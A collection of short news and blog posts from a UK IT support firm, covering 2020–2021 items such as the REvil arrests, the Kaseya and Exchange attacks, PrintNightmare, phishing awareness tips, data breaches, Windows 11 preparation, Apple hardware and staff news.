For apple device expertise and IT support, please contact our team today.

Law enforcement agencies have announced the arrest of seven individuals linked to REvil ransomware which caused a series of high profile ransomware incidents earlier this year.

Europol and the US Department of Justice recently announced the success of ‘Operation GoldDust’ which included a joint-effort from 17 countries – with arrests spanning Romania, Poland, South Korea and Kuwait.

The group are accused of 7,000 individual ransomware attacks, and links to attacks which breached organisations using Kaseya remote-manageement software back in July – a supply chain attack described by security specialists SentinelOne as a ‘well orchestrated’ and ‘mass-scale’ ransomware campaign.

REvil was also used in the devastating attack on the Colonial Pipeline which caused fuel shortages across the US East Coast, and at the world’s largest meat supplier JBS Foods earlier in 2021. Authorities are believe to have recovered around $6.1m in ransom payments so far.

Europol thanked all the countries involved for a concerted effort, Eurojust and Interpol, and also praised the contribution of a number of private cybersecurity firms who assisted Operation GoldDust with technical support.

A previous investigation by Romanian police suggested the REvil group were an offshoot of those responsible for GandCrab ransomware released in 2018, and resulted in the release of three universal decryption tools by UK and US authorities which are believed to have prevented a further €60m of ransom payments from being extorted.

After originally claiming to be disbanding in September, it was revealed REvil’s infrastructure was itself hacked by a joint team from the FBI, US Cyber Command and the Secret Service – and forced offline. Key members of the group’s leadership, believed to be Russian, were thought to be on the run.

The issue of Russian reluctance to tackle cyber-crime syndicates also spilled over into warnings of US retaliation during in-person talks between US President Joe Biden and Russian President Vladimir Putin in June.

Apple has released a staggeringly powerful new MacBook Pro model for 2021, bundling some important changes of direction.

Firstly, screen size: Apple will offer both 14-inch and 16-inch versions of the latest Pro, having presumably seen the light from both PC rivals (looking at you Dell), and it’s own Apple devotee fanbase, respectively – who for years have hoped for the larger 17” format to be re-released.

In a big U-turn, Apple has also re-introduced HDMI, SDXC and other ports, after famously removing all but USB-C from the Macbook’s chassis in 2016. That future didn’t quite work out – as Apple now acknowledges: the user-base of the Pro in particular have generally been power-users that need more options, not just more dongles.

Unlike its smaller cousins, the MacBook Pro 2021 isn’t burdened by quite the same portability obsession – favouring high performance for processor-intensive computing, photo, audio and video-editing – of the kind that makes Macs popular among creatives and software developers. The latest edition of the ‘power user’s’ MacBook incorporates the all-new M1 Pro and M1 Max chips, which boast some eye-watering performance statistics.

MagSafe also makes a welcome return, ensuring that a snagged power cable won’t pull your laptop off the table into oblivion. 2016’s Touch Bar, never quite beloved of the user-base, has been scrapped to enlarge the keyboard – returning the overall design in the direction that originally made the Pro so successful.

Prices begin at £1,899 inc VAT for the 14-inch model, and £2,399 inc VAT for the 16-inch. For those with no maximum budget, optional extras are available up to a blistering 64GB of memory and an 8TB (!) SSD, for those who need a laptop with all the stored-up potential of a nuclear reactor.

Lineal’s Tom Williamson Cary has become one of North Devon’s first successful ‘Kickstart scheme graduates’.

During his six month Kickstart placement at Lineal, Tom has worked on numerous new business opportunities, helped promote Lineal, and even mentored younger students as part of Lineal’s work with the PETROC ‘Techknowledgy Transfer’ Project – funded by the Department for Business, Energy and Industrial Strategy working with Innovate UK under the Business Basics programme.

Having completed the Kickstart programme, Tom will now join Lineal’s Marketing Team as a full-time staff member, to work on business development, and is believed to be among only a handful of such ‘Kickstart graduates’ in North Devon.

Lineal’s Managing Director Mike Matthews explained: “Tom is one of the first wave of Kickstart placements – one of around sixteen thousand young people across the UK – who’ve already benefitted from this scheme. He shows real promise and enthusiasm, and we’re delighted he’ll now be joining our team longer-term.”

Tom said: “I’ve learnt a lot over six months, and it’s been great to be welcomed to the team and get started on some exciting projects.”

The Kickstart scheme is a £2 billion Government programme dedicated to short-term work placements for those aged 16-24 who are eligible to claim Universal Credit – and aims to help bridge the gap between education and work, when many young people are at risk of longer-term unemployment.

Businesses can learn more about the Kickstart Scheme here.

Welcome Tom!

Lineal’s Lewis Marrow has graduated from the University of Plymouth to become North Devon’s first cybersecurity ‘Degree Apprentice’.

Starting at Lineal in 2017 to pursue an apprenticeship in cybersecurity via PETROC, Lewis’s skills have gone from strength-to-strength to see him achieve a 2:1 BSc (Hons) from the University of Plymouth (Digital Technology Solutions: Cyber Security Analyst.)

‘Degree’ or ‘Higher’ Apprenticeships are an advanced category of apprenticeship organised by the National Apprenticeship Service that combine undergraduate-level academic work with specialist training in the workplace.

Apprentices are expected to ‘earn-and-learn’ in tandem, gaining both knowledge and industry skills that are greatly-valued by employers. Many, like Lewis, are quickly snapped up by their business sponsors full-time once their apprenticeship is completed.

Lewis said: “A Degree Apprenticeship has been a fantastic experience allowing me to gain the knowledge and training I require to become an IT professional, the team at Lineal have been very supportive along the journey and I would recommend to anyone.”

While working at Lineal, Lewis won a Petroc Outstanding Achievement Award, has appeared in a Department for Culture, Media and Sport ‘Real Ideas’ film project promoting STEM education in schools, and his cybersecurity work has improved the resilience of numerous organisations – including helping Lineal itself achieve Cyber Essentials Plus Certification.

Lewis also recently completed the Great North Run in a blisteringly quick time of just under 1 hour and 27 minutes!

Congratulations Lewis!

Windows 11 is due to be released officially on 5th October 2021 – the first major version upgrade since Windows 10 was released in 2015.

As with Windows 10, PC users will be able to begin downloading the new version from this date, and new PCs will begin shipping with Windows 11 pre-installed.

If the thought of your PC changing fills you with dread – never fear! Here’s how you prepare:

See a preview

The first thing most users will notice is the visual improvement – Windows 11 features a ‘new design’ which forms the backbone of the update in an effort to make PC screens feel more user-friendly, calming and interact better with natural light.

Check Minimum Specifications

The following list summarises the published minimum specifications required to install and operate the new upcoming version:

Switching a device out of Windows 11 Home in S mode also requires internet connectivity. For all Windows 11 editions, internet access is required to perform updates and to download and take advantage of some features. A Microsoft account is required for some features.

Microsoft’s full specifications for Windows 11 can be found here.

Things to Expect

The following Windows 10 features are all due to disappear on the new version, in some cases being disabled, replaced by newer apps or available only via manual re-download from the Windows store on new installs:

– Internet Explorer
– Windows S Mode (Home Edition Only)
– Skype (Personal), 3D Viewer, Paint 3D and ‘OneNote for Windows 10’
– Start Menu Groups
– Taskbar Moving
– Tablet Mode
– Timeline

Cortana will also be relegated to the Start Menu – no longer used during setup and not automatically pinned to the taskbar.

Make a Backup / Create a Recovery Drive

Major (or even minor) Windows version upgrades are not without pitfalls as we’ve seen in recent years, so it’s worth checking that you have a full backup of your device prior to leaping into the unknown.

Synchronised copies of files in Microsoft OneDrive, Google Drive or Dropbox are always a plus, although for rapid restoration it’s also helpful to make a manual, local backup to a portable hard-drive that will be more quickly restorable if your subsequent upgrade doesn’t go to plan.

For the extra precaution of a route ‘back’ to Windows 10 if you discover a major compatibility issue, it’s important to make a recovery drive using a USB device.

Test the Beta

For power users, a beta version (Preview Build 22000.160) is available to test for those who register with the Microsoft Insider program.

For IT Support & Technical Expertise, please contact our team today.

Three Lineal IT engineers have scored among the ‘Top 50’ in the international CyberDrain ‘Capture-the-Flag’ SysAdmin Competition.

Hugo achieved a stunning 4th-place finish internationally – just narrowly missing out on a bronze medal for Team GB, but winning a PlayStation 5 in the process from competition cybersecurity-sponsor Huntress.

Martyn and Joe also scored very highly from among 1,000 competitors worldwide – finishing a record 17th and 32nd respectively.

Each passed significant milestones in their challenges – at 2000 points and 3000 points respectively – with Hugo becoming one of only four competitors worldwide to break the stratospheric 4000-point barrier.

Designed to test System Administration and IT engineering skills, the CyberDrain CTF challenge puts competitors through a series of forty investigative challenges across server and client-side, Microsoft Azure, Linux and Microsoft 365 environments. The competition ran throughout July, with bigger point bonuses awarded for more complex technical challenges.

Congratulations to all our competitors!

For IT Support and technical expertise – please contact us today.

An intrepid group of Lineal IT engineers are each competing in a capture the flag (CTF) event designed to sharpen the skills of Systems Administrators.

Points are awarded by completing a number of investigative technical challenges across Hyper-V, Microsoft Azure and 365 – capturing a ‘flag’, or important string of text, which credits the player’s score.

Designed to test System Administration and IT engineering skills, one thousand contestants are taking part in the ongoing July event, organised by CyberDrain, and supported by judges from Managed IT Service Provider association CyberGeek.

There are forty flag-capture challenges being attempted by (overwhelmingly) IT engineers around the world – spanning server and client, Azure, Linux and Microsoft 365 management.

Challenges must be completed independently, and the scoreboard is updated as individuals compete for first place. Contestants are encouraged to tackle more difficult challenges to win prizes, and find creative alternative solutions to capturing flags – although hacking is strictly prohibited!

The capture the flag competition is sponsored by a number of leading IT, communications and cybersecurity providers, including Microsoft, Datto and Huntress.

Good luck to all those taking part!

For IT Support and technical expertise – please contact us today.

Microsoft have delivered emergency out-of-band patches for the PrintNightmare zero day print spooler vulnerability with more on the horizon.

The bug, CVE-2021-34527, is existent in all versions of Windows and exploits a remote code execution vulnerability where the Windows Print Spooler service improperly performs privileged file operations.

This vulnerability means that a cyber attacker could run arbitrary code leading to instilling programs; view, change or delete data and even go so far as to create new accounts with full user system rights for exploitative purposes on the system.

A cautionary Microsoft statement released outlined the situation with “the security updates released on and after July 6, 2021 contain protections for CVE-2021-1675 and the additional remote code execution exploit in the Windows Print Spooler service known as ‘PrintNightmare’, documented in CVE-2021-34527.”

Patches released are available for Windows Server 2019, Windows Server 2012 R2, Windows Server 2008, Windows 8.1, Windows RT 8.1, a variety of supported versions of Windows 10 and the no longer supported Windows 7.

However, Microsoft announced that security updates are not currently available for Windows 10 version 1607, Windows Server 2012 or 2016 and urges prompt installation of its patches to deter any attacks via the domain controller when made available in due course. Microsoft also offer workarounds to those unable to download the July patches including the shutting down of the Print Spooler Service and the disabling of inbound remote printing through group policy.

The proof of concept (PoC) was accidentally released by Chinese technology group Sangfor on GitHub, but was cloned and cached before the researchers realised their mistake and took down the PoC. The group were under the impression that the exploit had already been patched as part of Microsoft’s CVE-2021-1675 patch – a patch that Microsoft confirmed was distinct about a different attack vector and vulnerability issue associated with RpcAddPrinterEx.

The situation is continually updating and the latest news on Windows patch releases can be found here.

More than a thousand organisations using Kaseya Remote Monitoring and Management (RMM) software are estimated to have been hit by ransomware over the weekend.

The supply chain attack, which was described as “colossal and devastating” by security research company Huntress, is believed to have been carried out by the same Russia-linked ‘REvil’ ransomware gang strongly-suspected of the recent ransomware attack on meat-packing corporation JBS.

Miami-based Kaseya’s ‘VSA’ product – which is used by Managed Service Providers to provide remote IT services to the systems of organisations worldwide, including endpoint and patch management – is believed to have been breached with an update that rolled-out ransomware to many of Kaseya’s own customers.

REvil themselves claim the total number of encrypted user endpoints around the world may be as high as one million, and have demanded an unprecedented ransom of $70m in Bitcoin (around £51m at current price.)

On Friday, Kaseya advised all customers to immediately shut down any on-premises Kaseya VSA servers, to prevent hackers shutting off administrative access for future fixes – and ignore any communication from hacking groups while an FBI investigation was ongoing. 

Access to Kaseya’s cloud-based SaaS services were initially shut down as a precaution, but has since been restored, and an endpoint detection tool has been published online here.

It is now believed that the exploit for Kaseya VSA had recently been highlighted by the Dutch Institute for Vulnerability disclosure, but early patches to rectify the problem had not yet been issued. In the 48 hours following the breach, more than 2,000 VSA severs were taken offline – suggesting that many organisations did heed warnings issued by the US Cybersecurity and Infrastructure Security Agency (CISA), the UK National Cyber Security Centre (NCSC) and others – although Swedish supermarkets, New Zealand schools and many others have had systems crashed by encrypted data.

Kaseya is published regular updates to its advisory page, here.

For Cyberscurity expertise and support, please contact our team today.

It’s 2021 but somehow the phishing email scams just keep coming.

You could almost miss the days when ‘Bill Gates’ would get in touch by email to offer you a shipment of diamonds. Modern email scams are much more sophisticated, the designs more convincing, and the payloads more dangerous – than ever.

Our advice remains the same:

• Be wary of any unsolicited email or unknown contact.
• Always look to see if an email is being sent from the correct domain.
• Don’t open any unexpected or mystery attachment, or click links to unrecognised destinations.
• If unsure, verify information with someone by asking via a communication method other than email (eg: by looking up a phone number separately from the email, and calling direct.)

Here’s our pick for some of the sneakiest our team have seen ‘in the wild’:

The Dodgy File Share (Deluxe Edition)

As useful as a crowbar in the arsenal of the burglar, cybercriminals have been using these ever since file sharing and collaboration apps took over the world – this one appeared even more persuasive for it’s nearly spot-on branding imitating a Microsoft 365 file share link.

But the Deluxe edition takes this scam to a whole new level – with just a mistaken click giving cybercriminals an automated account access, and even replying affirmatively to emails between users asking if these are genuine. Nasty.

The TV License

TV licensing is something many people buy once a year, often never receiving physical proof, and don’t think about much – making this a clever way to steal card details without arousing too much suspicion.

These often go the extra mile – making up fake customer numbers and renewal dates – to seem real, which can also identify the email as a scam if cross-referenced in your own records.

The Pandemic Phish

Cybercriminals don’t let little things like ethics get in the way of a good scam – with widespread public fear, and the NHS Covid vaccine roll-out in full swing, everything is an opportunity to hack accounts, steal information, or extort money.

Please be aware the real NHS will contact you via a combination of text message and/or post, and certainly won’t threaten you with the loss of your vaccine appointment if you don’t click a suspicious link.

Divine Intervention

OK, perhaps not a threat to everyone – but it’s easy to imagine this inheritance scam prompting a click from someone more spiritually-minded. Technology aside, a compelling story is sometimes the most persuasive scam of all.



For Cybersecurity expertise and support, please contact our team today.

A number of retail, news and social media websites experienced internet downtime caused by an outage at the global website cloud hosting service, Fastly.

For an hour from 11am BST today, users of Fastly’s hosting service including gov.uk, PayPal, Amazon and a whole host of other major company websites were greeted with and “Error 503 Service Unavailable” detailing problems with the cache server.

By 12.09pm BST, Fastly released a statement saying that their global network was coming back online and that it had been “investigating potential impact to performance with our CDN [content delivery network] services”. However, users were still met with slow loading times and sporadic access to multiple companies’ websites.

Error 503 message that greeted those trying to access the affected websites

When functioning correctly, CDNs such as Fastly aim to improve website security from denial-of-service attacks and reduce loading time for images, videos and HTML pages whilst managing sudden web traffic clusters for their customers’ websites.

ESET commented on the outage and its implication going forward with “whether it be malicious or otherwise, this highlights the importance and significance of these vast hosting companies and what they represent” – adding weight to the growing responsibility that these CDN providers have over global Internet control and access.

The outage raises security concerns over the over-centralisation of the internet in the hands of a few major hosting providers and asks questions about its reliability in the future should a larger scale problem like this occur again – demonstrating that we have not learned our lesson from the past hosting service outages as exemplified by the Cloudfare crash of 2019.

Full list of all websites affected below:

AFR, Age, Amazon, Boots, BuzzFeed, CNN, Deliveroo, Etsy, Evening Standard, Financial Times, Giphy, Horse and Hound, IGN, Imgur, Independent, Kickstarter, Le Monde, New York Times, PayPal, Pinterest, Reddit, Royal Mail, SMH, Spotify, Taboola, The Guardian, The Verge, Twitch, Twitter, UK Government website (including HM Revenue and Customs), Vimeo and Weightwatchers

Consumer watchdog Which? have investigated 13 legacy router models supplied by leading UK internet service providers (ISPs) including EE, Sky, TalkTalk, Virgin Media and Vodafone – a report discovered that around 7.5 million internet users are at risk from out-of-date hardware.

Out of the 13 router models investigated, 9 presented pressing security flaws that are unlikely to be in compliance with upcoming UK government legislation around tackling the security of connected devices.

The new legislation is in response to government figures showing that 49% of UK residents have purchased at least one smart device since the start of the COVID-19 Pandemic. Due to this huge increased national scope of vulnerability to potential cyber-attacks, the proposed legislation will ban easy to guess default passwords across all, enforces policies to make it easier to report software bugs that can be exploited by hackers on legacy or modern hardware.

Kate Bevan, Which?’s Computing Editor, commented that “proposed new government laws to tackle devices with poor security can’t come soon enough – and must be backed by strong enforcement.” Which? are simultaneously pushing for increased transparency from ISPs about how customers automatically or manually update their routers and how they should actively upgrade existing customers who are identified as being in the ‘at risk’ category.

Of those 7.5 million affected, 6 million users currently possess ISP hardware that has not been updated since 2018 and a few instances even as far back as 2016 – meaning that these vulnerable devices have not received security updates for defence against the latest threats posed by cybercrime.

A cluster of three main problems with ISP legacy hardware were identified by Which? ranging from weak default passwords that allow cybercriminals unlimited access to a router from anywhere, a lack of firmware updates and a local network vulnerability issue with EE Brightbox 2 giving potential hackers full control of the router to install malware or malicious spyware.

In response, Virgin Media have openly rejected Which?’s report conclusions; saying that 9 out of 10 customers are using their latest router models and are benefiting from regular router security updates. This sentiment was mirrored by BT Group (owners of EE), TalkTalk and Vodafone who announced that the HHG2500 device included in the Which? report has not been supplied since August 2019.

Devices with weak default passwords: TalkTalk HG635, TalkTalk HG523a, TalkTalk HG533, Virgin Media Super Hub 2, Vodafone HHG2500, Sky SR101 and Sky SR102.

Routers affected by lack of updates: Virgin Media Super Hub, Virgin Media Super Hub 2, Sky SR101, Sky SR102, TalkTalk HG523a, TalkTalk HG533 and TalkTalk HG635.

Routers that passed the Which? security tests: BT Home Hub 3B, BT Home Hub 4A, BT Home Hub 5B and Plusnet Hub Zero 2704N

Apple has released important security updates under macOS 11.3, in response to a serious gatekeeper vulnerability discovered by security researcher Cedric Owens.

The weakness, found in Apple’s ‘Gatekeeper’ tool which normally blocks unrecognised apps from being installed by default, allows a dangerous file to be rigged so as to not trigger the operating system’s inbuilt safeguards.

Writing in a Medium Post entitled ‘Gatekeeper Bypass: 2021 Edition’, Owens demonstrates a terrifying method by which an attacker can ‘very easily craft a macOS payload that is not checked by Gatekeeper.’

Once launched, no warning prompts prevent the user from installing just about any dangerous application, which can also communicate with external servers without even triggering App Transport Security (ATS).

The simplicity of the hack, which leverages the fact that scripts placed in Contents / macOS / directory are not checked, has been described by Objective-See as ‘massively bad’ and ‘a doozy’ of a blog post.

GateKeeper itself was originally introduced in 2012 as part of an effort to stop the spread of malware in Mac OS X ‘Lion’ v10.7.5, and was followed by enforced application notarisation in 2020 under macOS 10.15 ‘Catalina’, as Apple required software developers to have apps officially cleared for authorised use.

In response to the discovery, Apple have released macOS Big Sur 11.3 update with ‘improved state management’ that prevents the ‘bypass’ of Gatekeeper checks, and are urging macOS users to install the upgrade.

For Cybersecurity expertise and support, please contact our team today.

The NHS COVID-19 app, run by the Department for Health and Social Care (DHSC), has had its latest update blocked due to a breach in the privacy terms outlined by Apple and Google.

NHS Coronavirus app, available on Apple and Android devices, was designed to include a new feature that would allow users (upon showing a positive COVID test result) to upload a list of all locations and establishments they have visited using a phone scan QR code.

The Exposure Notification System built into the app’s software would then alert other users who had entered the same venue to monitor their symptoms or to immediately be tested. This update relies on location tracking for its function – a tracking type heavily reliant on Bluetooth monitoring of surrounding devices with the app installed – outlawed by Apple and Google privacy agreements.

This is the latest in a calamitous string of COVID app mishaps by the UK Government who had only recently scrapped plans for their own rival system to the Apple and Android contact tracing system.

Total development of the UK based rival tracking app cost £12 million over a 3 month period, but was eventually rejected due to battery life issues, privacy concerns over Bluetooth’s potentially invasive interaction with, and data collection from, other apps installed on the device such as Facebook and Twitter. As a consequence, the Apple and Android app was adopted even with the concerns over restrictions of location data.

As the UK returns to a quasi-normal state with Phase 2 of lockdown lifting measures being rolled out today, this news comes as a blow for the Department of Health who have released a statement reassuring the public that the update blockage does not affect the overall functionality of the NHS COVID-19 app and that there are “discussions ongoing with our partners to provide beneficial updates to the app which protect the public”

Instead of the updated version, the previous form of the app will still be obtainable in both the Google Play and iOS App Stores.

Facebook and LinkedIn have both suffered massive data breaches, exposing the details of more than 533 million and 500 million user accounts respectively, it has been revealed.

Extensive leaked data from Facebook was reportedly found online by security researcher Alon Gal – including the personal information of 11 million UK users such as phone numbers, locations, birth dates and many email addresses.

It’s believed that the ‘hack’ may relate to a bug in Facebook’s friend-adding ‘Contact Importer’ tool which was fixed in September 2019. Previous breaches in 2017 fell before the introduction of GDPR, which Facebook argues absolved it of responsibility to notify users.

Questions still hover over the LinkedIn breach in particular, with the company claiming much of their data appears to have been aggregated from other sources, or (like Facebook) were perhaps not technically ‘hacked’ at all – but scraped in bulk from publicly visible parts of the popular professional website.

The huge cache of Linkedin data was thought to be on sale, after security researches found a 2 million user ‘sample’ advertised online.

A Facebook spokesperson told Reuters the social media platform will not inform users if their accounts were part of the breach, and Linkedin are yet to issue a statement on this point – although given that LinkedIn has around 740 million accounts in total, a clear majority of its users are likely affected.

Users of both platforms can check if their email addresses (and now phone numbers) were likely breached via either platform over at: https://haveibeenpwned.com/ – and are advised to update passwords as a precaution.

For IT Support and cybersecurity expertise, please contact our team today.

Microsoft have urged the system admins of on-premise Exchange email servers to upgrade in response to new breaches from state-sponsored hackers.

The Chinese group, known as ‘HAFNIUM’, are believed to have exploited previously undiscovered zero-day vulnerabilities in Microsoft Exchange Server 2013, 2016 and 2019 via compromised US-based servers. Microsoft Exchange Online or related services (such as Microsoft 365) are not affected.

All four breaches were announced on Wednesday under the Microsoft Security Response Centre (MSRC) and graded ‘Critical’ – requiring urgent patching.

CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065 create a ‘perfect storm’ under which the attacker makes an untrusted connection to the targeted Exchange Server on port 443, and connects appearing to be someone with authorised access to add a web shell that grants a backdoor for future access.

HAFNIUM has previously been accused of industrial espionage and attempts to breach the technology of important private, public and national security organisations, including defence contractors.

As of 4th March, the Department of Homeland Security has also issued an emergency directive to all US federal agencies to urgently patch any on-premises Exchange servers by midday on 5th March.

For Cybersecurity advice and expertise, please contact our team today.

The UK National Cyber Security Centre have launched a new online Cyber Aware ‘Cyber Security Self-Assessment Tool’ to help small businesses.

Free to use, and aimed at organisations with fewer than ten staff, the short online questionnaire generates a handy to-do list of actionable cybersecurity recommendations and points to check, with guidance for each – depending on the answers submitted.

Questions are branching depending on the circumstances of each small business, but covers topics including backups, passwords, technology lifecycle management and more. Small business owners are also directed to useful plain-English resources to address each point highlighted.

Cyber Aware is a campaign launched by the UK National Cyber Security Centre (the public-facing arm of GCHQ) designed to provide simple guidance for individuals and small businesses to use technology more safely.

You can learn more about Cyber Aware, the NCSC, and get your own Action Plan here.

For IT Support and cybersecurity expertise: please contact our team today.

Support for Microsoft Edge Legacy will officially end on 9th March 2021, and the web browser will not receive any further security updates, Microsoft have announced.

The next Windows 10 monthly update, due 13th April, will automatically include the new (Chromium-based) Microsoft Edge and replace the legacy version automatically.

Edge was originally released in 2015 as a direct replacement and refresh for Internet Explorer, which was rapidly losing market share among the world’s most popular web browsers. Edge Legacy, which used EdgeHTML, was a programming fork of Microsoft’s ‘Trident’ engine that had been used in Internet Explorer 11.

The new Edge, released in 2020 and based on the same Chromium ‘Blink’ browser engine as Google Chrome, has proved more popular – and as of January 2021 looks set to overtake Firefox as the world’s third biggest web browser.

Enterprise organisations still provisioning the legacy version as standard are advised to plan their deployment of the new Microsoft Edge with the following set of steps.

Lineal are Microsoft Gold Partner – for IT expertise and support, please contact us today.

Approximately 50,000 UK customers have had .eu domains suspended, following Brexit.

The .eu domain registrar EURid has formally suspended 81,000 such domains as of 1st January 2021, following the decision that .eu ownership requires the owner to be resident in a country that holds membership of the European Union.

Many internationally trading UK companies hold foreign domain versions of their websites to assist trading overseas, support multiple languages, improve web performance in other territories and develop export markets.

Numerous IT services, including email, websites, directories and more are often also tied to domains which represent a key pillar of many companies’ authentication technology.

Many British domain holders cancelled their domains as the transition period approached – over 200,000 .eu domains held by UK customers were cancelled between 2018 and 2021, with registrars contacting customers multiple times to alert them to the changes.

Although the remaining 81,000 have not been not cancelled outright, UK customers have no way to recover these domains without being able to prove the owner holds citizenship of an EU member state, and provide a suitable registered address.

Britain’s exit from the EU also begins a countdown for these customers – who must either have an EU company representative to renew on their behalf, or face their domains put back up for sale again by 2022.

Need IT Support expertise? Contact Lineal today.

Microsoft have announced they will direct users away from SMS 2FA (‘text-based’ two-factor authentication) for security reasons.

Instead, the company will promote multi-factor authentication methods they consider to be more secure – including biometrics and secure authentication apps such as Microsoft Authenticator – for logging into Microsoft services such as Microsoft 365 and Azure.

SMS-based two-factor authentication, where the user typically receives a passcode text message to their smartphone that acts as a secondary confirmation of who they are, has been a staple of online banking and many other secure online services needing two-factor authentication (2FA) for over a decade.

However many now believes even SMS can be intercepted, and would rather sign users onto authenticator apps or issue secure keys with encoded passcode generation.

Official Microsoft statistics state that users who enable Multi-Factor Authentication (MFA) on their accounts to verify identity block 99.9% of all automated account breaches. Using SMS-based two-factor authentication should not ‘stop’ doing so (despite the flaws of SMS, any 2FA is better than none) but users should consider swapping to other methods.

We’ve talked before about the often-predicted ‘death of passwords’ – and possible scenarios for their phasing out, but in recent years a number of big tech firms, including Apple, Google and Microsoft have all suggested their long-term plans that seek to replace passwords with biometric or other forms of login.

However this modification to Microsoft’s advice will see more of a driving force behind MFA as specifically biometric, authenticator app or secure-key based, rather than relying on mobile networks for one-time passcodes.

For cybersecurity expertise and support, please contact out IT team today.

Apple have announced a new range of Mac devices with Apple M1 Silicon Chips. iPad and iPhone devices have used Apple’s own ‘A’ chips for some time, but M1 will be the first Apple chipset in macOS devices – which previously used Intel chips under license.

M1 is expected to show exceptional performance – with the 8-core CPU matching comparable PC laptop performance while using only 25% of the power, and able to deliver over twice the speed of comparable PC laptop CPU performance at maximum power levels.

Apple claim this makes the newest generation of devices – the new MacBook Air, MacBook Pro and Mac mini – faster than 90% of PCs sold in the last year.

Autumn 2020 sees the release of macOS Big Sur, the latest update to Apple’s Mac operating system, which has been optimised for the M1 chipset and its integrated graphics – as well as offering new app features such as universality for all Mac apps across all M1 devices, and offering iOS/iPadOS apps vis macOS.

For Apple expertise and support, please contact our team today.

Lineal are delighted to be taking part in the new Petroc Techknowledgey Transfer project – aimed at teaching students to support businesses with special technology masterclasses.

The project will involve some of North Devon’s best known technology firm, and cover a range of different topics, including modern accounting, digital marketing, procurement, cybersecurity and other important business processes.

“Petroc’s Techknowledgey Transfer​ project is excited to be supporting local businesses alongside local business experts Applegate Marketplace, Maynard Johns Chartered Accountants, Lineal, LimeCloud and Barr Media to deliver an exciting new project.

We are inviting small and medium sized businesses to access support on business admin technologies. Our business partners will be delivering fully funded virtual masterclasses to eligible businesses. We also have student work placements available for some businesses. For more information, please contact- [email protected]”

One hundred small businesses will be selected to take-part in the student-led part of the Petroc Techknowledgey Transfer, which will also be a studied project to measure the benefits of technical expertise being applied to businesses.

More information is available on Petroc’s website here.

For IT expertise and support, please contact our team today.

Lineal Software Solutions has become a managed servicer provider for Keeper Password Management.

We tested a number of different Password Management providers, including 1Password and LastPass, but were particularly impressed with Keeper.

Password management is increasingly recognised as a key pillar of cybersecurity: the UK National Cyber Security Centre admits it is ‘virtually impossible’ for users to use unique passwords for all their accounts without software assistance.

Password managers help users remember all their passwords – but can be a much more powerful tool for dramatically limiting the damage in the event of a single account being compromised.

Criminals increasingly use credential-stuffing attacks where automated tools use previously-breached account details to gain access to the user’s other accounts.

A good password manager ensures you can use a strong, randomly generated and distinct password across each of your accounts to prevent any single breach putting other data at risk.

Keeper can also notify users when breached passwords are identified online, integrate with single sign on tools such as Active Directory, and enforce multi-factor authentication – all important considerations for organisations needing to maintain cybersecurity standards across large teams.

For added convenience, Keeper is available via the web, Windows/MacOS desktop clients, browser extension and Android/iOS mobile app.

For Cybersecurity advice and expertise, please contact our team today.

The original source code to Microsoft Windows XP and Windows Server 2003 has leaked online – nearly two decades after their original release.

Official support for Windows XP ended back in 2014, and the final security patch was a one-off release in 2017 released in response to the WannaCry ransomware attack that temporarily crippled large parts of the NHS.

Among the interesting things we learned were that Microsoft originally included a hidden theme that made Windows XP look like Apple’s rival macOS operating system, and that the 4chan poster who released the dump had either added or helped spread anti-vax and population control conspiracy-theory material about Microsoft founder Bill Gates.

According to NetMarketShare, Windows XP still accounts for at least 1% of all PCs that generate web traffic worldwide (around 25 million PCs) although may actually include many air-gapped factory PCs and similar in practice.

The 43gb data dump has been available to Government agencies and similar for a while, although it’s unusual that the public at large have the opportunity to discover zero-day exploits for an entire operating system. Microsoft urges that users should not still be using XP, and the outdated platform is insecure even for the oldest legacy services.

For IT expertise and guidance, contact our IT team today.

AI lent a helping hand to one of our technical support teams last week to help Lineal save a local business from an email hack.

At 07:40 GMT on a seemingly normal week day, Barracuda Sentinel issued an alert to Lineal to say an account had been accessed from a suspicious location.  It seemed a malicious actor, appearing to be from Nigeria, compromised one of a client’s finance department email accounts, and created a forwarding/delete rule in the inbox.

Barracuda Sentinel’s AI email protection caught the account takeover attempt, and as a result, we were able to mitigate and resolve a significant threat to one of our customers. Barracuda Sentinel detects both account takeover attempts and attacks launched from compromised accounts.

Corporate account takeover presents a significant new threat to business. Hackers gain access to email accounts and use them as tools to launch subsequent targeted attacks, internally and against external targets – who themselves fall victim.

Account takeover or attacks that originate from these accounts are almost impossible to detect as they don’t use the usual impersonation techniques—they come from a legitimate account and appear to be from a trusted source, allowing the attacker to initiate sophisticated financial scams.

Lineal automatically picked up the alert & create an incident in Barracuda Sentinel.  Sentinel remediated the issue with an immediate password reset, disconnecting all active logon sessions for the user and deletion of any rules created during the incident time.  Within 40 minutes this potentially disastrous event was avoided.

Many Adobe Lightroom users on iOS have suffered a crippling data loss after a faulty routine update.

Users who updated to Adobe Lightroom Mobile 5.4.0 on iPhone or iPad had their photos and software presets deleted unexpectedly.

Adobe, which develops a large suite of creative apps for the media and design-sectors, has apologised and issued an update for the fault, but made clear that the lost data is irretrievable to those without backups.

The software company’s statement clarify it is only a subset of Lightroom users who have been affected – specifically those:

• Using Lightroom Mobile 5.4.0 on an iOS device (iPhone/iPad)
• Without an Adobe Cloud Subscription, or with cloud sync disabled
• Without a separate device or cloud backup (such as iCloud) in operation, independent of Lightroom itself.

This includes many free version users who would have trialled Lightroom without a full Adobe Creative Cloud subscription.

Hundreds of unlucky users took to Adobe’s Support Forums, social media and Reddit to complain that years of photos had been lost as part of the routine update. Others flagged that restoring from local device backups deleted the restore once the app was re-opened.

As noted by The Register, Adobe’s problem is especially acute given Lightroom’s specialist popularity among professional photographers, and others who have significant time or money invested in valued images.

Users are advised to update to 5.4.1 to avoid the issue, although this will not restore lost photos. As always: please, please, please maintain an independent backup of all data you can’t afford to lose.

For IT Support and business continuity assistance, please contact our team today.

Lineal’s Mike Matthews and Huma Mahmood-Khan recently featured on the Tech South West Podcast (‘Tribe Tech’) – to discuss the post-lockdown recovery, women in tech, and Lineal’s new SQLWorks MRP software.

It’s nearly a year since Lineal was shortlisted for Tech Company of the Year, and won a 2019 Tech South West Award (North Devon Cluster). Members of our team were invited to discuss recent developments, including Covid-19 and other issues facing the technical sector, alongside other award-winning tech businesses from across the region.

Listen now for the story behind our response to the C-19 crisis, the importance of more women exploring a career in tech, and the latest developments for our hotly-anticipated new SQLWorks software release.

Tech South West exists to champion the area’s growing number of technology businesses, showcase innovation and suport STEM skills across the wider South West region – partnering with a number of more local Tech Business Groups to advocate for the sector.

